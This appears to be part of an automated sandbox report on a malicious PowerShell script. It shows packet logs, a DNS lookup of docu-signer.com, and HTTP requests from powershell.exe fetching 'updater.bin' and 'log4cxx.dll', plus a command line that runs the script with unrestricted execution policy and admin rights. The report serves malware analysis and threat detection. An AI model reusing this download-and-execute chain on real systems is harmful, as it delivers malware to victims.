                                Dec 17, 2024 08:24:42.930368900 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.930440903 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.930527925 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.930550098 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.930579901 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.930592060 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.961299896 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.962346077 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.962492943 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.962519884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.962547064 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.962589979 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.970369101 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.970421076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.970484018 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.970511913 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.970536947 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.970554113 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.977694988 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.978411913 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.978458881 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.978504896 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.978529930 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.978558064 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.978571892 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.985274076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.985323906 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.985372066 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.985400915 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.985419989 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.985444069 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.993288040 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.993340015 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.993383884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.993412018 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.993427992 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.993449926 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.000725031 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.000772953 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.000823021 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.000847101 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.000868082 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.000890970 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.008697987 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.008748055 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.008795977 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.008816004 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.008832932 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.009263992 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.119090080 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.119144917 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.119235039 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.119261026 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.119292974 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.119308949 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.154712915 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.154779911 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.154820919 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.154850960 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.154884100 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.154906034 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.162590027 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.162616968 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.162702084 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.162733078 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.162751913 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.162780046 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.170444965 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.170469999 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.170557022 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.170567989 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.170608997 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.177433968 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.177449942 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.177512884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.177525043 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.177536011 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.177568913 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.185606003 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.185621977 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.185724020 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.185735941 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.185779095 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.191864014 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.191937923 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.191941977 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.191951990 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.191982031 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.199543953 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.199588060 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.199605942 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.199616909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.199649096 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.199661970 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.304384947 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.310853004 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.310883045 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.310930014 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.310960054 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.310981035 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.311006069 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.323518038 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.346159935 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.346190929 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.346256971 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.346292019 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.346307993 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.346333027 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.348828077 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.348897934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.348910093 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356791973 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356820107 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356882095 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.356905937 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356931925 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.365081072 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.365096092 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.365148067 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.365178108 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.365191936 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.369256973 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.369318962 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.369338036 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.369383097 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.376368999 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.376388073 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.376466990 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.376488924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.376528025 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.385073900 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.385091066 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.385139942 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.385165930 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.385179996 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.385204077 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.391964912 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.391983032 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.392060995 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.392096043 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.392134905 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.491679907 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.503249884 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.503257990 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.503403902 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.503447056 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.503493071 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.506670952 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.506733894 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.510323048 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.541887045 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.541893959 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.542007923 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.542031050 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549725056 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549745083 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549815893 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.549848080 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549863100 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.557745934 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.557760000 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.557818890 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.557842970 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.557856083 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.564714909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.564733982 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.564801931 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.564825058 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.564838886 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.572607994 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.572621107 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.572776079 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.572808027 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580207109 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580229998 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580291986 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.580307007 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580316067 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.588099957 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.588114977 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.588160038 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.588181973 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.588193893 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.636200905 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.695434093 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.695508003 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.695552111 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.697071075 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.725701094 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.731275082 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.731296062 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.731343031 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.731372118 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.731406927 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.738677025 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.738698006 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.738738060 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.738748074 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.738779068 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.746963024 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.746980906 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.747049093 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.747068882 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.747095108 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.753731012 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.753753901 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.753810883 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.753844023 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.753860950 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.761730909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.761746883 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.761809111 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.761823893 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769133091 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769153118 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769192934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.769203901 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769232035 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.777045965 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.777060986 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.777117968 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.777129889 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.782916069 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.782979965 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.782994986 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.783066034 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.893991947 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.894012928 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.894062996 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.894087076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.894114971 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.894135952 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.930147886 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.930164099 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.930234909 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.930246115 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.930275917 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.930299044 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.938133955 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.938149929 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.938230991 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.938240051 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.938302040 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.938474894 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.945316076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.945333004 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.945401907 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.945410013 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.945457935 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.953033924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.953049898 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.953136921 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.953145027 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.953196049 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.960576057 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.960591078 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.960649014 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.960705042 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.960717916 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.960774899 CET49700443192.168.2.7104.21.87.65
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Dec 17, 2024 08:24:34.961544037 CET | 55418 | 53 | 192.168.2.7 | 1.1.1.1
                                Dec 17, 2024 08:24:35.106278896 CET | 53 | 55418 | 1.1.1.1 | 192.168.2.7
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Dec 17, 2024 08:24:34.961544037 CET | 192.168.2.7 | 1.1.1.1 | 0x7d9b | Standard query (0) | docu-signer.com | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Dec 17, 2024 08:24:35.106278896 CET | 1.1.1.1 | 192.168.2.7 | 0x7d9b | No error (0) | docu-signer.com | | 104.21.87.65 | A (IP address) | IN (0x0001) | false
                                Dec 17, 2024 08:24:35.106278896 CET | 1.1.1.1 | 192.168.2.7 | 0x7d9b | No error (0) | docu-signer.com | | 172.67.142.2 | A (IP address) | IN (0x0001) | false
                                • docu-signer.com
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.7 | 49699 | 104.21.87.65 | 443 | 4548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-17 07:24:36 UTC | 189 | OUT | GET /api/uz/0912545164/updater.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: docu-signer.com
                                Connection: Keep-Alive
                                2024-12-17 07:24:37 UTC | 879 | IN | HTTP/1.1 200 OK
                                Date: Tue, 17 Dec 2024 07:24:36 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 893608
                                Connection: close
                                Last-Modified: Sun, 13 Oct 2024 09:57:05 GMT
                                ETag: "670b9971-da2a8"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftRxqo0%2B5rpFNvKFxYSdacM8pejS1AAme4vFoHO1dXzZV5cimQpbnzUThFXeSENpKw3DsR5C8mGNB1XPiBfhgocZur%2F5TTiP%2Fk7MJENB%2BxNoaQVRlTijBCWE%2BYiPGLgXZew%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8f352ca8ede21889-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1519&rtt_var=629&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=803&delivery_rate=1922317&cwnd=252&unsent_bytes=0&cid=919c7d4caf657f83&ts=672&x=0"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.7 | 49700 | 104.21.87.65 | 443 | 4548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-17 07:24:40 UTC | 165 | OUT | GET /api/uz/0912545164/log4cxx.dll HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: docu-signer.com
                                2024-12-17 07:24:41 UTC | 885 | IN | HTTP/1.1 200 OK
                                Date: Tue, 17 Dec 2024 07:24:40 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 2011444
                                Connection: close
                                Last-Modified: Sun, 15 Dec 2024 11:15:42 GMT
                                ETag: "675eba5e-1eb134"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0WUEuE2E%2BMva%2BPxVp9w5%2BDMXytQ422BTAVuxjzm7E2IzMfV0Gx5KbOQHm%2FZlTZVsQwbEPBtEOcZYEYq1SZ2PMYWtkQ9yLd09%2FBdeW3YBFr02jK9Y%2FWvJ3Ldd%2B0efKfKxZc%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8f352cc20c33425c-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1578&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=803&delivery_rate=1828428&cwnd=226&unsent_bytes=0&cid=7b8856d62bc6350f&ts=682&x=0"



                                Target ID:0
                                Start time:02:24:29
                                Start date:17/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1"
                                Imagebase:0x7ff741d30000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:02:24:29
                                Start date:17/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1449154927.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5241b6d0ed2616d314d2171a639255a1cb75339fcdaebc7275a0b87dda614da9
                                  • Instruction ID: 900155014adbbc367d52563f6baed4c8dc061a73dcc0eaf45bb2bcffd0d6f1be
                                  • Opcode Fuzzy Hash: 5241b6d0ed2616d314d2171a639255a1cb75339fcdaebc7275a0b87dda614da9
                                  • Instruction Fuzzy Hash: 7F01677111CB4C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3665D636E881CB45